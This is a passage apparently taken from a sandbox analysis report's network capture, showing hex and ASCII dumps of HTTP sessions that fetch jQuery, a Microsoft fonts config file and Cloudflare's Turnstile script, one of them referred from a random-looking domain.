                                                              Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                              2024-07-03 07:40:34 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                              Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                              2024-07-03 07:40:34 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                              Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                              2024-07-03 07:40:34 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                              Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                              2024-07-03 07:40:34 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                              Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                              2024-07-03 07:40:34 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                              Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                              2024-07-03 07:40:34 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                              Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                              2024-07-03 07:40:34 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                              Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                              2024-07-03 07:40:34 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                              Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                              2024-07-03 07:40:34 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                              Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              16192.168.2.64973523.43.61.160443
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:40:34 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Accept: */*
                                                              Accept-Encoding: identity
                                                              If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                              Range: bytes=0-2147483646
                                                              User-Agent: Microsoft BITS/7.8
                                                              Host: fs.microsoft.com
                                                              2024-07-03 07:40:35 UTC535INHTTP/1.1 200 OK
                                                              Content-Type: application/octet-stream
                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                              ApiVersion: Distribute 1.1
                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                              X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                              Cache-Control: public, max-age=116949
                                                              Date: Wed, 03 Jul 2024 07:40:34 GMT
                                                              Content-Length: 55
                                                              Connection: close
                                                              X-CID: 2
                                                              2024-07-03 07:40:35 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                              Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              17192.168.2.649736104.17.3.1844434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:40:34 UTC648OUTGET /turnstile/v0/g/d2a97f6b6ec9/api.js HTTP/1.1
                                                              Host: challenges.cloudflare.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: */*
                                                              Sec-Fetch-Site: cross-site
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: script
                                                              Referer: https://vkwek.ckyucle.com/
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:40:35 UTC408INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:40:35 GMT
                                                              Content-Type: application/javascript; charset=UTF-8
                                                              Content-Length: 42691
                                                              Connection: close
                                                              accept-ranges: bytes
                                                              last-modified: Thu, 27 Jun 2024 13:08:16 GMT
                                                              cache-control: max-age=31536000
                                                              access-control-allow-origin: *
                                                              cross-origin-resource-policy: cross-origin
                                                              Server: cloudflare
                                                              CF-RAY: 89d53a6ecce841f2-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-07-03 07:40:35 UTC961INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 45 74 28 65 2c 61 2c 72 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 62 3d 65 5b 75 5d 28 67 29 2c 5f 3d 62 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 6c 29 7b 72 28 6c 29 3b 72 65 74 75 72 6e 7d 62 2e 64 6f 6e 65 3f 61 28 5f 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 5f 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 77 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2c 72 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 61 2c 72 29 3b 66 75 6e 63 74
                                                              Data Ascii: "use strict";(function(){function Et(e,a,r,o,c,u,g){try{var b=e[u](g),_=b.value}catch(l){r(l);return}b.done?a(_):Promise.resolve(_).then(o,c)}function wt(e){return function(){var a=this,r=arguments;return new Promise(function(o,c){var u=e.apply(a,r);funct
                                                              2024-07-03 07:40:35 UTC1369INData Raw: 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 61 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 72 2e 70 75 73 68 2e 61 70 70 6c 79 28 72 2c 6f 29 7d 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 54 74 28 65 2c 61 29 7b 72 65 74 75 72 6e 20 61 3d 61 21 3d 6e 75 6c 6c 3f 61 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65
                                                              Data Ascii: tySymbols){var o=Object.getOwnPropertySymbols(e);a&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),r.push.apply(r,o)}return r}function Tt(e,a){return a=a!=null?a:{},Object.getOwnPropertyDescriptors?Object.definePropertie
                                                              2024-07-03 07:40:35 UTC1369INData Raw: 28 65 2c 61 29 7c 7c 52 74 28 65 2c 61 29 7c 7c 41 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 43 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 43 65 28 65 2c 61 29 7b 76 61 72 20 72 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30 5d 26 31 29 74 68 72 6f 77 20 75 5b 31 5d 3b 72 65 74 75 72 6e 20 75 5b 31 5d 7d 2c 74 72 79 73 3a 5b 5d 2c 6f 70 73 3a 5b 5d 7d 2c 6f 2c 63 2c 75 2c 67 3b 72 65 74 75 72 6e 20 67 3d 7b 6e
                                                              Data Ascii: (e,a)||Rt(e,a)||At()}function C(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ce(e,a){var r={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={n
                                                              2024-07-03 07:40:35 UTC1369INData Raw: 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 43 74 3d 33 30 30 30 32 30 3b 76 61 72 20 4e 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4d 41 4e 41 47 45 44 3d 22 6d 61 6e 61 67 65 64 22 2c 65 2e 4e 4f 4e 5f 49 4e 54 45 52 41 43 54 49 56 45 3d 22 6e 6f 6e 2d 69 6e 74 65 72 61 63 74 69 76 65 22 2c 65 2e 49 4e 56 49 53 49 42 4c 45
                                                              Data Ascii: enges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Ct=300020;var Ne=300030;var U;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE
                                                              2024-07-03 07:40:35 UTC1369INData Raw: 39 5f 2d 5d 7b 30 2c 33 32 7d 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 4a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 76 6f 69 64 20 30 3f 21 30 3a 74 79 70 65 6f 66 20 65 3d 3d 22 73 74 72 69 6e 67 22 26 26 76 72 2e 74 65 73 74 28 65 29 7d 76 61 72 20 6d 72 3d 2f 5e 5b 61 2d 7a 30 2d 39 5f 5c 2d 3d 5d 7b 30 2c 32 35 35 7d 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 5a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 76 6f 69 64 20 30 3f 21 30 3a 74 79 70 65 6f 66 20 65 3d 3d 22 73 74 72 69 6e 67 22 26 26 6d 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 65 74 28 65 29 7b 72 65 74 75 72 6e 20 4e 28 5b 22 6e 6f 72 6d 61 6c 22 2c 22 63 6f 6d 70 61 63 74 22 2c 22 69 6e 76 69 73 69 62 6c 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 29 7b
                                                              Data Ascii: 9_-]{0,32}$/i;function Je(e){return e===void 0?!0:typeof e=="string"&&vr.test(e)}var mr=/^[a-z0-9_\-=]{0,255}$/i;function Ze(e){return e===void 0?!0:typeof e=="string"&&mr.test(e)}function et(e){return N(["normal","compact","invisible"],e)}function tt(e){
                                                              2024-07-03 07:40:35 UTC1369INData Raw: 22 3b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 62 2c 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 5f 2c 22 74 75 72 6e 73 74 69 6c 65 2f 69 66 2f 6f 76 32 2f 61 76 30 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 61 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2e 73 69 7a 65 29 2e 63 6f 6e 63 61 74 28 6c 29 7d 66 75 6e 63 74 69 6f 6e 20 4c 65 28 65 29 7b 69 66 28 65 3d 3d 3d 76 6f 69 64 20 30 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c
                                                              Data Ascii: ";return"".concat(b,"/cdn-cgi/challenge-platform/").concat(_,"turnstile/if/ov2/av0/rcv").concat(o,"/").concat(e,"/").concat(a,"/").concat(r.theme,"/").concat(r.size).concat(l)}function Le(e){if(e===void 0)throw new ReferenceError("this hasn't been initial
                                                              2024-07-03 07:40:35 UTC1369INData Raw: 65 29 7b 76 61 72 20 61 3d 74 79 70 65 6f 66 20 4d 61 70 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 6e 65 77 20 4d 61 70 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 50 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 47 74 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 69 66 28 74 79 70 65 6f 66 20 61 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 69 66 28 61 2e 68 61 73 28 6f 29 29 72 65 74 75 72 6e 20 61 2e 67 65 74 28 6f 29 3b 61 2e 73 65 74
                                                              Data Ascii: e){var a=typeof Map=="function"?new Map:void 0;return Pe=function(o){if(o===null||!Gt(o))return o;if(typeof o!="function")throw new TypeError("Super expression must either be null or a function");if(typeof a!="undefined"){if(a.has(o))return a.get(o);a.set
                                                              2024-07-03 07:40:35 UTC1369INData Raw: 63 2e 73 72 63 29 29 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 4b 74 28 29 7b 76 61 72 20 65 3d 73 74 28 29 3b 65 7c 7c 70 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34 33 37 37 37 29 3b 76 61 72 20 61 3d 7b 6c 6f 61 64 65 64 41 73 79 6e 63 3a 21 31 2c 70 61 72 61 6d 73 3a 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 7d 3b 28 65 2e 61 73 79 6e 63 7c 7c 65 2e 64 65 66 65 72 29 26 26 28 61 2e 6c 6f 61 64 65 64 41 73 79 6e 63 3d 21 30 29 3b 76 61 72 20 72 3d 65 2e 73 72 63 2c 6f 3d 72 2e 73 70 6c 69 74 28 22 3f 22 29 3b 72 65 74 75 72 6e 20 6f 2e 6c 65 6e
                                                              Data Ascii: c.src))return c}function Kt(){var e=st();e||p("Could not find Turnstile script tag, some features may not be available",43777);var a={loadedAsync:!1,params:new URLSearchParams};(e.async||e.defer)&&(a.loadedAsync=!0);var r=e.src,o=r.split("?");return o.len
